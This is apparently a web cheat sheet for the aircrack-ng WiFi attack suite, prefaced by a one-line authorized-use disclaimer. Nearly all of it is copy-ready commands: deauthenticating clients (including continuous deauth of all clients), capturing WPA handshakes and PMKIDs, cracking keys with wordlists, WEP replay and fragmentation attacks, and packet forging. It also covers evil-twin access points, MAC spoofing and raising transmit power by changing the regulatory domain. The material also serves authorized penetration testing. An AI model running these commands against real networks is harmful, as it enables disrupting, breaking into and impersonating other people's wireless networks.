← All cheat sheets

AIRCRACK-NG

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

WiFi security auditing suite. Monitor mode, packet capture,
deauthentication, WEP/WPA/WPA2 cracking, and rogue AP attacks.

INSTALLATION#

sudo apt install aircrack-ng                # Kali/Debian
brew install aircrack-ng                    # macOS

MONITOR MODE#

# Check wireless interfaces
iwconfig
airmon-ng

# Kill interfering processes
sudo airmon-ng check kill

# Start monitor mode
sudo airmon-ng start wlan0
# Creates wlan0mon interface

# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Manual monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

SCANNING / RECON#

# Scan all channels
sudo airodump-ng wlan0mon

# Scan specific channel
sudo airodump-ng wlan0mon -c 6

# Scan specific band
sudo airodump-ng wlan0mon --band a          # 5GHz
sudo airodump-ng wlan0mon --band bg         # 2.4GHz
sudo airodump-ng wlan0mon --band abg        # All bands

# Filter by BSSID
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF

# Filter by ESSID
sudo airodump-ng wlan0mon --essid "TargetNetwork"

# Write output
sudo airodump-ng wlan0mon -w capture --output-format pcap
sudo airodump-ng wlan0mon -w capture --output-format csv,pcap

# Focus on target AP
sudo airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture

WPA/WPA2 HANDSHAKE CAPTURE#

# 1. Start capture on target channel
sudo airodump-ng wlan0mon -c CHANNEL --bssid AP_BSSID -w handshake

# 2. Deauthenticate client (force reconnection)
sudo aireplay-ng -0 5 -a AP_BSSID -c CLIENT_MAC wlan0mon
# -0 = deauth, 5 = number of packets

# 3. Wait for "WPA handshake: XX:XX:XX:XX:XX:XX" message

# Deauth all clients
sudo aireplay-ng -0 10 -a AP_BSSID wlan0mon

CRACKING WPA/WPA2#

# Dictionary attack
sudo aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt

# Specify target BSSID
sudo aircrack-ng handshake-01.cap -b AP_BSSID -w wordlist.txt

# Use multiple wordlists
sudo aircrack-ng handshake-01.cap -w list1.txt,list2.txt,list3.txt

# Convert to hashcat format
aircrack-ng handshake-01.cap -j hashcat_file
# Or use hcxpcapngtool
hcxpcapngtool -o hash.22000 handshake-01.cap

# Crack with hashcat (much faster with GPU)
hashcat -m 22000 hash.22000 rockyou.txt

# Crack with john
aircrack-ng handshake-01.cap -J john_hash
john --wordlist=rockyou.txt john_hash.hccap

WEP CRACKING#

# 1. Start capture
sudo airodump-ng wlan0mon -c CHANNEL --bssid AP_BSSID -w wep_capture

# 2. Generate traffic (ARP replay)
sudo aireplay-ng -3 -b AP_BSSID -h YOUR_MAC wlan0mon

# 3. Fake authentication (if no clients)
sudo aireplay-ng -1 0 -a AP_BSSID -h YOUR_MAC wlan0mon

# 4. Crack (need ~40,000+ IVs)
sudo aircrack-ng wep_capture-01.cap

DEAUTHENTICATION ATTACKS#

# Deauth specific client
sudo aireplay-ng -0 10 -a AP_BSSID -c CLIENT_MAC wlan0mon

# Deauth all clients on AP
sudo aireplay-ng -0 0 -a AP_BSSID wlan0mon
# -0 0 = continuous deauth

# Deauth with mdk3/mdk4 (more powerful)
sudo mdk4 wlan0mon d -B AP_BSSID            # Deauth
sudo mdk4 wlan0mon d                        # Deauth all

PMKID ATTACK (CLIENTLESS)#

# No handshake needed — capture PMKID from AP directly

# Using hcxdumptool
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --filterlist_ap=AP_BSSID --filtermode=2 --enable_status=1

# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng

# Crack
hashcat -m 22000 pmkid.22000 rockyou.txt

PACKET INJECTION#

# Test injection capability
sudo aireplay-ng -9 wlan0mon                # Injection test
sudo aireplay-ng -9 -a AP_BSSID wlan0mon    # Against specific AP

# Chopchop attack (WEP)
sudo aireplay-ng -4 -b AP_BSSID wlan0mon

# Fragmentation attack (WEP)
sudo aireplay-ng -5 -b AP_BSSID wlan0mon

# Forge ARP request
sudo packetforge-ng -0 -a AP_BSSID -h YOUR_MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w forged.cap

TOOL SUITE#

Tool              Purpose
----              -------
airmon-ng         Monitor mode management
airodump-ng       Packet capture and AP scanning
aireplay-ng       Packet injection and deauth
aircrack-ng       WEP/WPA key cracking
airbase-ng        Rogue AP / evil twin
airdecap-ng       Decrypt captured packets
airdecloak-ng     Remove WEP cloaking
packetforge-ng    Forge encrypted packets
airtun-ng         Virtual tunnel interface
besside-ng        Automated WPA cracking

EVIL TWIN (ROGUE AP)#

# Create fake AP
sudo airbase-ng -a AP_BSSID --essid "FreeWiFi" -c 6 wlan0mon

# With forwarding (bridge to internet)
sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon
# Configure at0 interface for DHCP and routing

USEFUL COMMANDS#

# Check interface capabilities
iw list | grep -A 10 "Supported interface modes"

# Set TX power
sudo iw reg set BO                          # Set regulatory domain
sudo iwconfig wlan0 txpower 30              # Set power (if supported)

# Change MAC address
sudo ip link set wlan0 down
sudo macchanger -r wlan0                    # Random MAC
sudo ip link set wlan0 up

TIPS#

  - Kill NetworkManager before monitor mode (airmon-ng check kill)
  - Not all WiFi adapters support monitor mode and injection
  - Recommended chipsets: Atheros AR9271, Realtek RTL8812AU
  - PMKID attack is faster — no client deauth needed
  - Use hashcat (GPU) over aircrack-ng for WPA cracking speed
  - WPA3 is resistant to offline dictionary attacks
  - Deauth attacks are detectable by WIDS/WIPS
  - Always get authorization before testing WiFi networks
  - WEP is essentially broken; any WEP network is compromised
  - Capture on the correct channel for reliable handshakes